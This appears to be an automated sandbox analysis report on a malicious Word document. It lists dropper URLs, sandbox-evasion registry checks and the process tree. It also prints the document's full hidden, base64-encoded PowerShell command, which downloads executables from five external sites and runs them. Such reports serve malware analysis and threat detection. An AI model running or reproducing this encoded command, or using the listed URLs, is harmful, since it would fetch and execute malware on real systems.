Analysis
-
max time kernel
29s -
resource
win10v191014 -
submitted
12-12-2019 08:36
General
-
Target
7f734ca6856681e74ac65b18dc5ee9224830a958d80f9630e4a335974c8dec3d.doc
-
Sample
191212-7aval24h4s
-
SHA256
7f734ca6856681e74ac65b18dc5ee9224830a958d80f9630e4a335974c8dec3d
Score
5/10
Malware Config
Extracted
Language
ps1
Source
URLs
exe.dropper
http://theaustinochuks.com/personal_array/kvrmif/
exe.dropper
http://sarafifallahi.com/wp-admin/uUXtpLhI/
exe.dropper
http://faustosarli.com/wp-admin/mYZW0/
exe.dropper
http://janejahan.com/wp-content/hqiw1u9/
exe.dropper
http://vikstory.ca/h/f2cgRvw/
Signatures
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 4876 WINWORD.EXE -
Suspicious use of WriteProcessMemory 1 IoCs
Processes:
SppExtComObj.exedescription pid process target process PID 68 wrote to memory of 1924 68 SppExtComObj.exe SLUI.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
Powershell.exepid process 4404 Powershell.exe -
Checks system information in the registry 2 TTPs 2 IoCs
System information is often read in order to detect sandboxing environments.
Processes:
description ioc Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description ioc Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
WINWORD.EXEpid process 4876 WINWORD.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
WINWORD.EXEpid process 4876 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Powershell.exedescription pid process Token: SeDebugPrivilege 4404 Powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7f734ca6856681e74ac65b18dc5ee9224830a958d80f9630e4a335974c8dec3d.doc" /o ""1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\SLUI.exe"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABQAGUAZwB4AGkAagByAGsAdgBwAD0AJwBEAGUAbgBsAGsAdQB3AGQAdQBmAHoAJwA7ACQAUABhAHAAbgBvAHkAZABzAHgAIAA9ACAAJwA1ADEAMQAnADsAJABHAGwAegBpAGEAZwBwAGoAPQAnAEYAZQBkAHIAeQB2AHQAbwBhAG4AJwA7ACQATAB0AGUAdQB2AHMAcQBtAGIAbABhAHEAZgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUABhAHAAbgBvAHkAZABzAHgAKwAnAC4AZQB4AGUAJwA7ACQAQQBtAHMAeQBiAGMAcgBrAGYAPQAnAEkAYwBmAGsAbgBwAGkAeQAnADsAJABKAG8AawBzAHYAcQB5AHYAeQBtAD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABuAGUAVAAuAHcAZQBCAGMAbABJAGUAbgBUADsAJABKAHUAeABkAHIAaABoAGoAdABpAD0AJwBoAHQAdABwADoALwAvAHQAaABlAGEAdQBzAHQAaQBuAG8AYwBoAHUAawBzAC4AYwBvAG0ALwBwAGUAcgBzAG8AbgBhAGwAXwBhAHIAcgBhAHkALwBrAHYAcgBtAGkAZgAvACoAaAB0AHQAcAA6AC8ALwBzAGEAcgBhAGYAaQBmAGEAbABsAGEAaABpAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB1AFUAWAB0AHAATABoAEkALwAqAGgAdAB0AHAAOgAvAC8AZgBhAHUAcwB0AG8AcwBhAHIAbABpAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBtAFkAWgBXADAALwAqAGgAdAB0AHAAOgAvAC8AagBhAG4AZQBqAGEAaABhAG4ALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBoAHEAaQB3ADEAdQA5AC8AKgBoAHQAdABwADoALwAvAHYAaQBrAHMAdABvAHIAeQAuAGMAYQAvAGgALwBmADIAYwBnAFIAdgB3AC8AJwAuACIAcwBgAHAAbABJAHQAIgAoACcAKgAnACkAOwAkAEMAZgBnAHEAZQBlAHoAbAA9ACcASQBvAHkAawBtAHAAYwBlAG0AcgAnADsAZgBvAHIAZQBhAGMAaAAoACQARAB4AG0AZgB4AHQAYQB1AGUAYwB4AHAAdAAgAGkAbgAgACQASgB1AHgAZAByAGgAaABqAHQAaQApAHsAdAByAHkAewAkAEoAbwBrAHMAdgBxAHkAdgB5AG0ALgAiAEQAbwBgAFcATgBMAG8AQQBkAGYAYABJAGAATABlACIAKAAkAEQAeABtAGYAeAB0AGEAdQBlAGMAeABwAHQALAAgACQATAB0AGUAdQB2AHMAcQBtAGIAbABhAHEAZgApADsAJABMAGQAdgBvAHMAbABnAHoAcwA9ACcARwB5AGgAbABoAHcAeQByAHkAdQBoACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQATAB0AGUAdQB2AHMAcQBtAGIAbABhAHEAZgApAC4AIgBsAGUAbgBgAEcAYABUAEgAIgAgAC0AZwBlACAAMwAzADkAOAAyACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAYABUAEEAUgBUACIAKAAkAEwAdABlAHUAdgBzAHEAbQBiAGwAYQBxAGYAKQA7ACQAVgB4AHgAbQBkAG0AYwBpAD0AJwBEAHYAcQBsAG8AZQBsAHUAdAB4AHIAbQAnADsAYgByAGUAYQBrADsAJABWAGkAbwB6AHUAbQBlAGwAPQAnAFgAbgBqAG4AbwBjAG8AeQBkAG0AJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARwBtAGQAdQBqAG0AeQB3AG0AaQA9ACcAUQB2AHgAYwBvAGoAcABzAHUAZwBvAGEAJwA=1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/4876-0-0x0000012EFAF50000-0x0000012EFAF51000-memory.dmpFilesize
4KB